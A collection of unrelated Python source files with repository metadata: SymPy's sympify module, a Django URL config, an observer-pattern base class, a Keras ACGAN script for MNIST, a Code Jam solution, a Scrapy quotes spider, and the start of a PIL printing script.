ad60d3723a3aa6548bac9334238ccc7213d77e9d | 5f67c696967456c063e5f8a0d14cf18cf845ad38 | /installer/sympy/core/sympify.py | 1a6415e6be5aa9cfcac775523a52e978a7d6c1e5 | [] | no_license | wuxi20/Pythonista | 3f2abf8c40fd6554a4d7596982c510e6ba3d6d38 | acf12d264615749f605a0a6b6ea7ab72442e049c | refs/heads/master | 2020-04-02T01:17:39.264328 | 2019-04-16T18:26:59 | 2019-04-16T18:26:59 | 153,848,116 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,615 | py | """sympify -- convert objects SymPy internal format"""
from __future__ import print_function, division
from inspect import getmro
from .core import all_classes as sympy_classes
from .compatibility import iterable, string_types
class SympifyError(ValueError):
    """Raised when an object cannot be converted into SymPy's internal form."""
    def __init__(self, expr, base_exc=None):
        # Keep the offending expression and, optionally, the original exception.
        self.expr = expr
        self.base_exc = base_exc
    def __str__(self):
        if self.base_exc is not None:
            return ("Sympify of expression '%s' failed, because of exception being "
                    "raised:\n%s: %s" % (self.expr, self.base_exc.__class__.__name__,
                    str(self.base_exc)))
        return "SympifyError: %r" % (self.expr,)
converter = {} # See sympify docstring.
class CantSympify(object):
    """
    Mix in this trait to a class to disallow sympification of its instances.
    Example
    =======
    >>> from sympy.core.sympify import sympify, CantSympify
    >>> class Something(dict):
    ...     pass
    ...
    >>> sympify(Something())
    {}
    >>> class Something(dict, CantSympify):
    ...     pass
    ...
    >>> sympify(Something())
    Traceback (most recent call last):
    ...
    SympifyError: SympifyError: {}
    """
    # Marker mixin only: it carries no behavior of its own.
    pass
def sympify(a, locals=None, convert_xor=True, strict=False, rational=False, evaluate=True):
    """Converts an arbitrary expression to a type that can be used inside SymPy.
    For example, it will convert Python ints into instance of sympy.Rational,
    floats into instances of sympy.Float, etc. It is also able to coerce symbolic
    expressions which inherit from Basic. This can be useful in cooperation
    with SAGE.
    It currently accepts as arguments:
       - any object defined in sympy
       - standard numeric python types: int, long, float, Decimal
       - strings (like "0.09" or "2e-19")
       - booleans, including ``None`` (will leave ``None`` unchanged)
       - lists, sets or tuples containing any of the above
    If the argument is already a type that SymPy understands, it will do
    nothing but return that value. This can be used at the beginning of a
    function to ensure you are working with the correct type.
    >>> from sympy import sympify
    >>> sympify(2).is_integer
    True
    >>> sympify(2).is_real
    True
    >>> sympify(2.0).is_real
    True
    >>> sympify("2.0").is_real
    True
    >>> sympify("2e-45").is_real
    True
    If the expression could not be converted, a SympifyError is raised.
    >>> sympify("x***2")
    Traceback (most recent call last):
    ...
    SympifyError: SympifyError: "could not parse u'x***2'"
    Locals
    ------
    The sympification happens with access to everything that is loaded
    by ``from sympy import *``; anything used in a string that is not
    defined by that import will be converted to a symbol. In the following,
    the ``bitcount`` function is treated as a symbol and the ``O`` is
    interpreted as the Order object (used with series) and it raises
    an error when used improperly:
    >>> s = 'bitcount(42)'
    >>> sympify(s)
    bitcount(42)
    >>> sympify("O(x)")
    O(x)
    >>> sympify("O + 1")
    Traceback (most recent call last):
    ...
    TypeError: unbound method...
    In order to have ``bitcount`` be recognized it can be imported into a
    namespace dictionary and passed as locals:
    >>> from sympy.core.compatibility import exec_
    >>> ns = {}
    >>> exec_('from sympy.core.evalf import bitcount', ns)
    >>> sympify(s, locals=ns)
    6
    In order to have the ``O`` interpreted as a Symbol, identify it as such
    in the namespace dictionary. This can be done in a variety of ways; all
    three of the following are possibilities:
    >>> from sympy import Symbol
    >>> ns["O"] = Symbol("O")  # method 1
    >>> exec_('from sympy.abc import O', ns)  # method 2
    >>> ns.update(dict(O=Symbol("O")))  # method 3
    >>> sympify("O + 1", locals=ns)
    O + 1
    If you want *all* single-letter and Greek-letter variables to be symbols
    then you can use the clashing-symbols dictionaries that have been defined
    there as private variables: _clash1 (single-letter variables), _clash2
    (the multi-letter Greek names) or _clash (both single and multi-letter
    names that are defined in abc).
    >>> from sympy.abc import _clash1
    >>> _clash1
    {'C': C, 'E': E, 'I': I, 'N': N, 'O': O, 'Q': Q, 'S': S}
    >>> sympify('C & Q', _clash1)
    And(C, Q)
    Strict
    ------
    If the option ``strict`` is set to ``True``, only the types for which an
    explicit conversion has been defined are converted. In the other
    cases, a SympifyError is raised.
    >>> print(sympify(None))
    None
    >>> sympify(None, strict=True)
    Traceback (most recent call last):
    ...
    SympifyError: SympifyError: None
    Evaluation
    ----------
    If the option ``evaluate`` is set to ``False``, then arithmetic and
    operators will be converted into their SymPy equivalents and the
    ``evaluate=False`` option will be added. Nested ``Add`` or ``Mul`` will
    be denested first. This is done via an AST transformation that replaces
    operators with their SymPy equivalents, so if an operand redefines any
    of those operations, the redefined operators will not be used.
    >>> sympify('2**2 / 3 + 5')
    19/3
    >>> sympify('2**2 / 3 + 5', evaluate=False)
    2**2/3 + 5
    Extending
    ---------
    To extend ``sympify`` to convert custom objects (not derived from ``Basic``),
    just define a ``_sympy_`` method to your class. You can do that even to
    classes that you do not own by subclassing or adding the method at runtime.
    >>> from sympy import Matrix
    >>> class MyList1(object):
    ...     def __iter__(self):
    ...         yield 1
    ...         yield 2
    ...         raise StopIteration
    ...     def __getitem__(self, i): return list(self)[i]
    ...     def _sympy_(self): return Matrix(self)
    >>> sympify(MyList1())
    Matrix([
    [1],
    [2]])
    If you do not have control over the class definition you could also use the
    ``converter`` global dictionary. The key is the class and the value is a
    function that takes a single argument and returns the desired SymPy
    object, e.g. ``converter[MyList] = lambda x: Matrix(x)``.
    >>> class MyList2(object):   # XXX Do not do this if you control the class!
    ...     def __iter__(self):  #     Use _sympy_!
    ...         yield 1
    ...         yield 2
    ...         raise StopIteration
    ...     def __getitem__(self, i): return list(self)[i]
    >>> from sympy.core.sympify import converter
    >>> converter[MyList2] = lambda x: Matrix(x)
    >>> sympify(MyList2())
    Matrix([
    [1],
    [2]])
    Notes
    =====
    Sometimes autosimplification during sympification results in expressions
    that are very different in structure than what was entered. Until such
    autosimplification is no longer done, the ``kernS`` function might be of
    some use. In the example below you can see how an expression reduces to
    -1 by autosimplification, but does not do so when ``kernS`` is used.
    >>> from sympy.core.sympify import kernS
    >>> from sympy.abc import x
    >>> -2*(-(-x + 1/x)/(x*(x - 1/x)**2) - 1/(x*(x - 1/x))) - 1
    -1
    >>> s = '-2*(-(-x + 1/x)/(x*(x - 1/x)**2) - 1/(x*(x - 1/x))) - 1'
    >>> sympify(s)
    -1
    >>> kernS(s)
    -2*(-(-x + 1/x)/(x*(x - 1/x)**2) - 1/(x*(x - 1/x))) - 1
    """
    # Fast path: objects whose class is already a known SymPy class are
    # returned unchanged.
    try:
        cls = a.__class__
    except AttributeError:  # a is probably an old-style class object
        cls = type(a)
    if cls in sympy_classes:
        return a
    if cls is type(None):
        if strict:
            raise SympifyError(a)
        else:
            return a
    # Registered converters: try the exact class first, then walk the MRO.
    try:
        return converter[cls](a)
    except KeyError:
        for superclass in getmro(cls):
            try:
                return converter[superclass](a)
            except KeyError:
                continue
    # CantSympify is an explicit opt-out marker (see class above).
    if isinstance(a, CantSympify):
        raise SympifyError(a)
    # The canonical extension hook: objects may provide their own _sympy_().
    try:
        return a._sympy_()
    except AttributeError:
        pass
    # Non-strings: try numeric coercion (float first so e.g. Decimal works).
    if not isinstance(a, string_types):
        for coerce in (float, int):
            try:
                return sympify(coerce(a))
            except (TypeError, ValueError, AttributeError, SympifyError):
                continue
    if strict:
        raise SympifyError(a)
    # Containers: sympify elements recursively, rebuilding with the same type.
    if iterable(a):
        try:
            return type(a)([sympify(x, locals=locals, convert_xor=convert_xor,
                rational=rational) for x in a])
        except TypeError:
            # Not all iterables are rebuildable with their type.
            pass
    if isinstance(a, dict):
        try:
            return type(a)([sympify(x, locals=locals, convert_xor=convert_xor,
                rational=rational) for x in a.items()])
        except TypeError:
            # Not all iterables are rebuildable with their type.
            pass
    # At this point we were given an arbitrary expression
    # which does not inherit from Basic and doesn't implement
    # _sympy_ (which is a canonical and robust way to convert
    # anything to SymPy expression).
    #
    # As a last chance, we try to take "a"'s normal form via unicode()
    # and try to parse it. If it fails, then we have no luck and
    # return an exception
    try:
        from .compatibility import unicode
        a = unicode(a)
    except Exception as exc:
        raise SympifyError(a, exc)
    from sympy.parsing.sympy_parser import (parse_expr, TokenError,
                                            standard_transformations)
    from sympy.parsing.sympy_parser import convert_xor as t_convert_xor
    from sympy.parsing.sympy_parser import rationalize as t_rationalize
    transformations = standard_transformations
    if rational:
        transformations += (t_rationalize,)
    if convert_xor:
        transformations += (t_convert_xor,)
    try:
        a = a.replace('\n', '')
        expr = parse_expr(a, local_dict=locals, transformations=transformations, evaluate=evaluate)
    except (TokenError, SyntaxError) as exc:
        raise SympifyError('could not parse %r' % a, exc)
    return expr
def _sympify(a):
    """
    Short version of sympify for internal usage for __add__ and __eq__ methods
    where it is ok to allow some things (like Python integers and floats) in
    the expression. This excludes things (like strings) that are unwise to
    allow into such an expression.
    >>> from sympy import Integer
    >>> Integer(1) == 1
    True
    >>> Integer(1) == '1'
    False
    >>> from sympy.abc import x
    >>> x + 1
    x + 1
    >>> x + '1'
    Traceback (most recent call last):
    ...
    TypeError: unsupported operand type(s) for +: 'Symbol' and 'str'
    see: sympify
    """
    # strict=True means only types with a registered/explicit conversion are
    # accepted; anything else (notably strings) raises SympifyError.
    return sympify(a, strict=True)
def kernS(s):
    """Use a hack to try keep autosimplification from joining Integer or
    minus sign into an Add of a Mul; this modification doesn't
    prevent the 2-arg Mul from becoming an Add, however.
    Examples
    ========
    >>> from sympy.core.sympify import kernS
    >>> from sympy.abc import x, y, z
    The 2-arg Mul allows a leading Integer to be distributed but kernS will
    prevent that:
    >>> 2*(x + y)
    2*x + 2*y
    >>> kernS('2*(x + y)')
    2*(x + y)
    If use of the hack fails, the un-hacked string will be passed to sympify...
    and you get what you get.
    XXX This hack should not be necessary once issue 1497 has been resolved.
    """
    import re
    from sympy.core.symbol import Symbol
    hit = False
    if '(' in s:
        if s.count('(') != s.count(")"):
            raise SympifyError('unmatched left parenthesis')
        # Pick a "kernel" symbol name that does not occur in the input.
        kern = '_kern'
        while kern in s:
            kern += "_"
        olds = s
        # digits*( -> digits*kern*(
        s = re.sub(r'(\d+)( *\* *)\(', r'\1*%s\2(' % kern, s)
        # negated parenthetical
        kern2 = kern + "2"
        while kern2 in s:
            kern2 += "_"
        # step 1: -(...) --> kern-kern*(...)
        target = r'%s-%s*(' % (kern, kern)
        s = re.sub(r'- *\(', target, s)
        # step 2: double the matching closing parenthesis
        # kern-kern*(...) --> kern-kern*(...)kern2
        # NOTE(review): `j = s.find('(')` restarts the scan from the start of
        # the string (not from the target position found above) and `nest` is
        # not reset between iterations -- looks suspicious when the pattern
        # occurs more than once; confirm against upstream sympy.
        i = nest = 0
        while True:
            j = s.find(target, i)
            if j == -1:
                break
            j = s.find('(')
            for j in range(j, len(s)):
                if s[j] == "(":
                    nest += 1
                elif s[j] == ")":
                    nest -= 1
                if nest == 0:
                    break
            s = s[:j] + kern2 + s[j:]
            i = j
        # step 3: put in the parentheses
        # kern-kern*(...)kern2 --> (-kern*(...))
        s = s.replace(target, target.replace(kern, "(", 1))
        s = s.replace(kern2, ')')
        hit = kern in s
    for i in range(2):
        try:
            expr = sympify(s)
            break
        except:  # the kern might cause unknown errors, so use bare except
            if hit:
                s = olds  # maybe it didn't like the kern; use un-kerned s
                hit = False
                continue
            expr = sympify(s)  # let original error raise
    if not hit:
        return expr
    # Substitute the kernel symbol away (kern*x -> x) without resimplifying.
    rep = {Symbol(kern): 1}
    def _clear(expr):
        if isinstance(expr, (list, tuple, set)):
            return type(expr)([_clear(e) for e in expr])
        if hasattr(expr, 'subs'):
            return expr.subs(rep, hack2=True)
        return expr
    expr = _clear(expr)
    # hope that kern is not there anymore
    return expr
| [
"22399993@qq.com"
] | 22399993@qq.com |
bd25c0f81a90e0e4885aa39d8448b944fd5868c5 | 5c309a45507e26ac7320a474d82c5887c7af9f30 | /MySite/MySite/urls.py | 4ce2d92aeef3abf905ee0d81702179359a2608c5 | [] | no_license | MMohan1/MySite | 09c003dcad8158ee3e16a5d14405cb6aaeb396fe | c14c2fb13cff10e79b8cb444ec1cf4996c7742cc | refs/heads/master | 2021-01-22T13:08:37.734894 | 2014-12-25T09:37:39 | 2014-12-25T09:37:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 420 | py | from django.conf.urls import patterns, include, url
from django.contrib import admin
# URL routing table (legacy Django `patterns()` style, removed in Django 1.10).
urlpatterns = patterns('',
    # Examples:
    # url(r'^$', 'MySite.views.home', name='home'),
    # Delegate /polls/... to the polls app; the namespace lets templates
    # reverse URLs as "polls:<name>".
    url(r'^polls/',
        include('polls.urls', namespace="polls")),
    url(r'^admin/', include(admin.site.urls)),
)
| [
"manmohansharma987@gmail.com"
] | manmohansharma987@gmail.com |
6ab384b642a8b07cb9c428b54ea3e3024d822969 | e3365bc8fa7da2753c248c2b8a5c5e16aef84d9f | /indices/declens.py | fc0729c9a852460c42f02a55fcaa38f7b97bf136 | [] | no_license | psdh/WhatsintheVector | e8aabacc054a88b4cb25303548980af9a10c12a8 | a24168d068d9c69dc7a0fd13f606c080ae82e2a6 | refs/heads/master | 2021-01-25T10:34:22.651619 | 2015-09-23T11:54:06 | 2015-09-23T11:54:06 | 42,749,205 | 2 | 3 | null | 2015-09-23T11:54:07 | 2015-09-18T22:06:38 | Python | UTF-8 | Python | false | false | 294 | py | ii = [('ChanWS.py', 1), ('WilbRLW4.py', 1), ('WilbRLW2.py', 1), ('CoolWHM.py', 1), ('GilmCRS.py', 1), ('WadeJEB.py', 1), ('BachARE.py', 4), ('MereHHB3.py', 1), ('JacoWHI2.py', 1), ('JacoWHI.py', 2), ('DibdTRL.py', 1), ('DwigTHH.py', 1), ('SadlMLP2.py', 3), ('KeigTSS.py', 1), ('BentJDO.py', 1)] | [
"prabhjyotsingh95@gmail.com"
] | prabhjyotsingh95@gmail.com |
93055757e6e1ffa121edea16b0567e884338203f | b05fee086482565ef48785f2a9c57cfe2c169f68 | /part_one/3-observer_pattern/after/observer/subject_abc.py | f2fb23403b3aafcbd9450c06eee0527def13727a | [] | no_license | diegogcc/py-design_patterns | 76db926878d5baf9aea1f3d2f6a09f4866c3ce1e | 2b49b981f2d3514bbd02796fe9a8ec083df6bb38 | refs/heads/master | 2023-04-01T08:28:53.211024 | 2021-04-05T11:48:19 | 2021-04-05T11:48:19 | 304,145,791 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 575 | py | from abc import ABCMeta
from observer import ABCObserver
class ABCSubject(metaclass=ABCMeta):
    """Subject half of the observer pattern: keeps a set of observers and
    notifies them of state changes.

    BUG FIX: the original used in-place set operators (``|=`` / ``-=``) on
    the class-level ``_observers`` set, which mutated the one set shared by
    every subject instance -- observers attached to one subject were
    notified by all subjects.  Rebinding with the non-mutating ``|`` / ``-``
    operators gives each instance its own set on first attach/detach while
    keeping the class attribute as a safe empty default (so subclasses that
    never call ``super().__init__()`` keep working).
    """

    _observers = set()  # empty default; never mutated in place

    def attach(self, observer):
        """Register an observer; it must derive from ABCObserver."""
        if not isinstance(observer, ABCObserver):
            raise TypeError('Observer not derived from ABCObserver')
        # Rebind (do not mutate) so this instance gets its own set.
        self._observers = self._observers | {observer}

    def detach(self, observer):
        """Unregister an observer; unknown observers are ignored."""
        self._observers = self._observers - {observer}

    def notify(self, value=None):
        """Call update() on every attached observer, passing value if given."""
        for observer in self._observers:
            if value is None:
                observer.update()
            else:
                observer.update(value)
"diegoc906@gmail.com"
] | diegoc906@gmail.com |
7d35f14bb906cebc46778b3d46b888fb39a6dd75 | 17c08636954df7e565277d932c4434a924d7ee83 | /chapter5-improved-gan/acgan-mnist-5.3.1.py | 85e62937d86a4e898ff778b2f07ebba11f815105 | [
"MIT"
] | permissive | gbusr/Advanced-Deep-Learning-with-Keras | 539158ecacc25b30505349bfdb2bc903d6f5eeef | 74ac64963b0d93a8bb2c6078af2e16fe53702776 | refs/heads/master | 2020-03-19T10:03:14.563594 | 2018-06-06T12:00:33 | 2018-06-06T12:00:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,791 | py | '''Trains ACGAN on MNIST using Keras
This version of ACGAN is similar to DCGAN. The difference mainly
is that the z-vector of geneerator is conditioned by a one-hot label
to produce specific fake images. The discriminator is trained to
discriminate real from fake images and predict the corresponding
one-hot labels.
[1] Radford, Alec, Luke Metz, and Soumith Chintala.
"Unsupervised representation learning with deep convolutional
generative adversarial networks." arXiv preprint arXiv:1511.06434 (2015).
[2] Odena, Augustus, Christopher Olah, and Jonathon Shlens.
"Conditional image synthesis with auxiliary classifier gans."
arXiv preprint arXiv:1610.09585 (2016).
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import keras
from keras.layers import Activation, Dense, Input
from keras.layers import Conv2D, Flatten
from keras.layers import Reshape, Conv2DTranspose
from keras.layers import LeakyReLU
from keras.layers import BatchNormalization
from keras.optimizers import RMSprop
from keras.models import Model
from keras.datasets import mnist
from keras.utils import to_categorical
from keras.models import load_model
import numpy as np
import math
import matplotlib.pyplot as plt
import os
import argparse
def build_generator(inputs, y_labels, image_size):
    """Build a Generator Model
    Inputs are concatenated before Dense layer.
    Stacks of BN-ReLU-Conv2DTranpose to generate fake images
    Output activation is sigmoid instead of tanh in orig DCGAN.
    Sigmoid converges easily.
    # Arguments
        inputs (Layer): Input layer of the generator (the z-vector)
        y_labels (Layer): Input layer for one-hot vector to condition
            the inputs
        image_size: Target size of one side (assuming square image)
    # Returns
        Model: Generator Model
    """
    # Start from a (image_size/4, image_size/4) feature map; the two
    # stride-2 transposed convolutions below upsample back to image_size.
    image_resize = image_size // 4
    kernel_size = 5
    layer_filters = [128, 64, 32, 1]
    # Condition the latent vector on the class label by concatenation.
    x = keras.layers.concatenate([inputs, y_labels], axis=1)
    x = Dense(image_resize * image_resize * layer_filters[0])(x)
    x = Reshape((image_resize, image_resize, layer_filters[0]))(x)
    for filters in layer_filters:
        # First two layers (filters > 32) upsample with stride 2; the last
        # two keep spatial size.
        if filters > layer_filters[-2]:
            strides = 2
        else:
            strides = 1
        x = BatchNormalization()(x)
        x = Activation('relu')(x)
        x = Conv2DTranspose(filters=filters,
                            kernel_size=kernel_size,
                            strides=strides,
                            padding='same')(x)
    x = Activation('sigmoid')(x)
    generator = Model([inputs, y_labels], x, name='generator')
    return generator
def build_discriminator(inputs, num_labels, image_size):
    """Build a Discriminator Model
    Stacks of LeakyReLU-Conv2D to discriminate real from fake
    The network does not converge with BN so it is not used here
    unlike in DCGAN paper.
    # Arguments
        inputs (Layer): Input layer of the discriminator (the image)
        num_labels (int): Dimension of one-hot vector output
        image_size (int): Target size of one side (assuming square image)
    # Returns
        Model: Discriminator Model
    """
    kernel_size = 5
    layer_filters = [32, 64, 128, 256]
    x = inputs
    for filters in layer_filters:
        # First 3 convolution layers downsample with stride 2; the last
        # keeps spatial size.
        if filters == layer_filters[-1]:
            strides = 1
        else:
            strides = 2
        x = LeakyReLU(alpha=0.2)(x)
        x = Conv2D(filters=filters,
                   kernel_size=kernel_size,
                   strides=strides,
                   padding='same')(x)
    x = Flatten()(x)
    # First output is probability that the image is real
    y_source = Dense(1)(x)
    y_source = Activation('sigmoid', name='source')(y_source)
    # Second output is 10-dim one-hot vector of label
    # (ACGAN auxiliary classifier head, with one hidden Dense layer)
    y_class = Dense(layer_filters[-2])(x)
    y_class = Dense(num_labels)(y_class)
    y_class = Activation('softmax', name='label')(y_class)
    discriminator = Model(inputs, [y_source, y_class], name='discriminator')
    return discriminator
def train(models, data, params):
    """Train the discriminator and adversarial Networks
    Alternately train discriminator and adversarial networks by batch.
    Discriminator is trained first with real and fake images and
    corresponding one-hot labels.
    Adversarial is trained next with fake images pretending to be real and
    corresponding one-hot labels.
    Generate sample images per save_interval.
    # Arguments
        models (list): Generator, Discriminator, Adversarial models
        data (list): x_train, y_train data
        params (list): Network parameters
    """
    generator, discriminator, adversarial = models
    x_train, y_train = data
    batch_size, latent_size, train_steps, num_labels, model_name = params
    save_interval = 500
    # Fixed noise/labels so saved snapshots are comparable across steps.
    noise_input = np.random.uniform(-1.0, 1.0, size=[16, latent_size])
    noise_class = np.eye(num_labels)[np.arange(0, 16) % num_labels]
    print(model_name,
          "Labels for generated images: ",
          np.argmax(noise_class, axis=1))
    for i in range(train_steps):
        # Random real images and their labels
        rand_indexes = np.random.randint(0, x_train.shape[0], size=batch_size)
        real_images = x_train[rand_indexes, :, :, :]
        real_labels = y_train[rand_indexes, :]
        # Generate fake images and their labels
        noise = np.random.uniform(-1.0, 1.0, size=[batch_size, latent_size])
        fake_labels = np.eye(num_labels)[np.random.choice(num_labels,
                                                          batch_size)]
        fake_images = generator.predict([noise, fake_labels])
        x = np.concatenate((real_images, fake_images))
        y_labels = np.concatenate((real_labels, fake_labels))
        # Label real and fake images (1 = real, 0 = fake)
        y = np.ones([2 * batch_size, 1])
        y[batch_size:, :] = 0
        # Train the Discriminator network
        metrics = discriminator.train_on_batch(x, [y, y_labels])
        loss = metrics[0]
        accuracy = metrics[1]
        log = "%d: [discriminator loss: %f, acc: %f]" % (i, loss, accuracy)
        # Generate fake images and their labels
        noise = np.random.uniform(-1.0, 1.0, size=[batch_size, latent_size])
        fake_labels = np.eye(num_labels)[np.random.choice(num_labels,
                                                          batch_size)]
        # Label fake images as real (the generator's training target)
        y = np.ones([batch_size, 1])
        # Train the Adversarial network (discriminator weights are frozen)
        metrics = adversarial.train_on_batch([noise, fake_labels], [y, fake_labels])
        loss = metrics[0]
        accuracy = metrics[1]
        log = "%s [adversarial loss: %f, acc: %f]" % (log, loss, accuracy)
        print(log)
        if (i + 1) % save_interval == 0:
            if (i + 1) == train_steps:
                show = True
            else:
                show = False
            plot_images(generator,
                        noise_input=noise_input,
                        noise_class=noise_class,
                        show=show,
                        step=(i + 1),
                        model_name=model_name)
    # Persist the trained generator for later inference (-g option).
    generator.save(model_name + ".h5")
def plot_images(generator,
                noise_input,
                noise_class,
                show=False,
                step=0,
                model_name="gan"):
    """Generate fake images and plot them
    For visualization purposes, generate fake images
    then plot them in a square grid
    # Arguments
        generator (Model): The Generator Model for fake images generation
        noise_input (ndarray): Array of z-vectors
        noise_class (ndarray): One-hot class vectors conditioning each z
        show (bool): Whether to show plot or not
        step (int): Appended to filename of the save images
        model_name (string): Model name
    """
    # Images are written to <model_name>/<step>.png
    os.makedirs(model_name, exist_ok=True)
    filename = os.path.join(model_name, "%05d.png" % step)
    images = generator.predict([noise_input, noise_class])
    print(model_name , " labels for generated images: ", np.argmax(noise_class, axis=1))
    plt.figure(figsize=(2.2, 2.2))
    num_images = images.shape[0]
    image_size = images.shape[1]
    rows = int(math.sqrt(noise_input.shape[0]))
    for i in range(num_images):
        plt.subplot(rows, rows, i + 1)
        image = np.reshape(images[i], [image_size, image_size])
        plt.imshow(image, cmap='gray')
        plt.axis('off')
    plt.savefig(filename)
    if show:
        plt.show()
    else:
        plt.close('all')
def build_and_train_models():
    """Assemble the ACGAN (generator, discriminator, adversarial) and train it
    on MNIST.  The generator is conditioned on one-hot digit labels; the
    discriminator predicts both real/fake and the digit class.
    """
    # MNIST dataset
    (x_train, y_train), (_, _) = mnist.load_data()
    image_size = x_train.shape[1]
    x_train = np.reshape(x_train, [-1, image_size, image_size, 1])
    x_train = x_train.astype('float32') / 255
    num_labels = np.amax(y_train) + 1
    y_train = to_categorical(y_train)
    model_name = "acgan_mnist"
    # Network parameters
    latent_size = 100
    batch_size = 64
    train_steps = 40000
    lr = 0.0002
    decay = 6e-8
    input_shape = (image_size, image_size, 1)
    label_shape = (num_labels, )
    # Build discriminator Model
    inputs = Input(shape=input_shape, name='discriminator_input')
    discriminator = build_discriminator(inputs, num_labels, image_size)
    # [1] uses Adam, but discriminator converges easily with RMSprop
    optimizer = RMSprop(lr=lr, decay=decay)
    # 2 loss fuctions: 1) Probability image is real
    # 2) Class label of the image
    loss = ['binary_crossentropy', 'categorical_crossentropy']
    discriminator.compile(loss=loss,
                          optimizer=optimizer,
                          metrics=['accuracy'])
    discriminator.summary()
    # Build generator model
    input_shape = (latent_size, )
    inputs = Input(shape=input_shape, name='z_input')
    y_labels = Input(shape=label_shape, name='y_labels')
    generator = build_generator(inputs, y_labels, image_size)
    generator.summary()
    # Build adversarial model = generator + discriminator
    # (halved learning rate/decay slows the generator relative to the
    # discriminator)
    optimizer = RMSprop(lr=lr*0.5, decay=decay*0.5)
    # Freeze discriminator weights while training the generator.
    discriminator.trainable = False
    adversarial = Model([inputs, y_labels],
                        discriminator(generator([inputs, y_labels])),
                        name=model_name)
    adversarial.compile(loss=loss,
                        optimizer=optimizer,
                        metrics=['accuracy'])
    adversarial.summary()
    # Train discriminator and adversarial networks
    models = (generator, discriminator, adversarial)
    data = (x_train, y_train)
    params = (batch_size, latent_size, train_steps, num_labels, model_name)
    train(models, data, params)
def test_generator(generator, class_label=None):
    """Sample 16 digits from a trained generator and display them.

    If class_label is None a random digit class is drawn for each sample;
    otherwise all 16 samples are conditioned on the given digit (which is
    also used as the step number in the saved filename).
    """
    noise_input = np.random.uniform(-1.0, 1.0, size=[16, 100])
    step = 0
    if class_label is None:
        num_labels = 10
        noise_class = np.eye(num_labels)[np.random.choice(num_labels, 16)]
    else:
        noise_class = np.zeros((16, 10))
        noise_class[:,class_label] = 1
        step = class_label
    plot_images(generator,
                noise_input=noise_input,
                noise_class=noise_class,
                show=True,
                step=step,
                model_name="test_outputs")
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    help_ = "Load generator h5 model with trained weights"
    parser.add_argument("-g", "--generator", help=help_)
    help_ = "Specify a specific digit to generate"
    parser.add_argument("-d", "--digit", type=int, help=help_)
    args = parser.parse_args()
    if args.generator:
        # Inference mode: load a previously trained generator and sample.
        generator = load_model(args.generator)
        class_label = None
        if args.digit is not None:
            class_label = args.digit
        test_generator(generator, class_label)
    else:
        # Training mode (default): build the ACGAN and train from scratch.
        build_and_train_models()
| [
"rowel.atienza@gmail.com"
] | rowel.atienza@gmail.com |
12a7c034769b181f60b365d9088a81e33ef47347 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_200/260.py | d0237b341a7b08a08d30d63213739e6e1ee988f4 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 773 | py | def good(numberStr):
numberList = map(int, list(numberStr))
length = len(numberList)
notYetFix = 0
for i in range(length - 1):
if numberList[i] < numberList[i+1]:
notYetFix = i+1
elif numberList[i] > numberList[i+1]:
break
elif i == length - 2 and numberList[i] == numberList[i+1]:
notYetFix = length - 1
if notYetFix != length - 1:
numberList[notYetFix] -= 1
for j in range(notYetFix+1, length):
numberList[j] = 9
resultList = map(str, numberList)
if resultList[0] == '0':
resultList[0] = ''
return ''.join(resultList)
# Driver (Python 2 only: raw_input / print statement): first input line is
# the number of test cases, each following line one number to tidy.
n = int(raw_input())
for i in range(n):
    input = raw_input().strip()  # NOTE(review): shadows the builtin `input`
    print "Case #{0}: {1}".format(i+1, good(input))
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
5fa492dd4548a8e0b896cfcc59dd262eb4d1a0b2 | 315b5795445848af093839214d7ce852b3080b66 | /Scrapy/tutorial/tutorial/spiders/quotes_spider.py | 89a646ff776c9e851e87e2a6ae5bb192d7aa9e63 | [] | no_license | yangyang0126/PythonSpider | 030657a04d91850c1bfe19a685f83e5dff670aeb | eb2b12557735eddf43603155a23bd582531c387d | refs/heads/master | 2021-06-25T16:21:39.561541 | 2021-03-31T11:03:17 | 2021-03-31T11:03:17 | 213,564,028 | 4 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,008 | py | # -*- coding: utf-8 -*-
"""
Created on Tue May 5 17:55:42 2020
@author: zhaoy
"""
import scrapy
class QuotesSpider(scrapy.Spider):
    """Spider for quotes.toscrape.com: saves each page's HTML to disk,
    yields one item per quote, and follows the "Next" pagination link.
    """
    name = "quotes"
    start_urls = [
        'http://quotes.toscrape.com/page/1/',
        'http://quotes.toscrape.com/page/2/',
    ]

    def parse(self, response):
        # Save the raw page for debugging/offline inspection.
        page = response.url.split("/")[-2]
        filename = 'quotes-%s.html' % page
        with open(filename, 'wb') as f:
            f.write(response.body)
        self.log('Saved file %s' % filename)
        for quote in response.css('div.quote'):
            yield {
                'text': quote.css('span.text::text').get(),
                'author': quote.css('small.author::text').get(),
                'tags': quote.css('div.tags a.tag::text').getall(),
            }
        # BUG FIX: pagination must use response.follow (scrapy.follow does
        # not exist), and ::attr(href).get() returns None on the last page
        # instead of raising KeyError as .attrib['href'] did -- so the
        # None guard below can actually fire.
        next_page = response.css('li.next a::attr(href)').get()
        if next_page is not None:
            yield response.follow(next_page, callback=self.parse)
| [
"zhaojingyi0126@163.com"
] | zhaojingyi0126@163.com |
178fea7a115e8617e01db117b27aadc0ff3258ef | 2545252679e65a1912a56a8e6cfd3f3f8e26af87 | /virtualenv/Scripts/pilprint.py | fd424994966180548bd4c1b7369a7139513279fc | [] | no_license | tubbatun/customize-django-oscar-templates- | 796a1288cd18f12258c3c20958ce84e8fdb9af78 | 41404e4aa59aa36a4159034af7fab32a8b3b3263 | refs/heads/master | 2021-01-11T11:37:46.098571 | 2016-12-19T10:55:02 | 2016-12-19T10:55:02 | 76,853,932 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,642 | py | #!c:\users\sathi\desktop\tryoscar\virtualenv\scripts\python.exe
#
# The Python Imaging Library.
# $Id$
#
# print image files to postscript printer
#
# History:
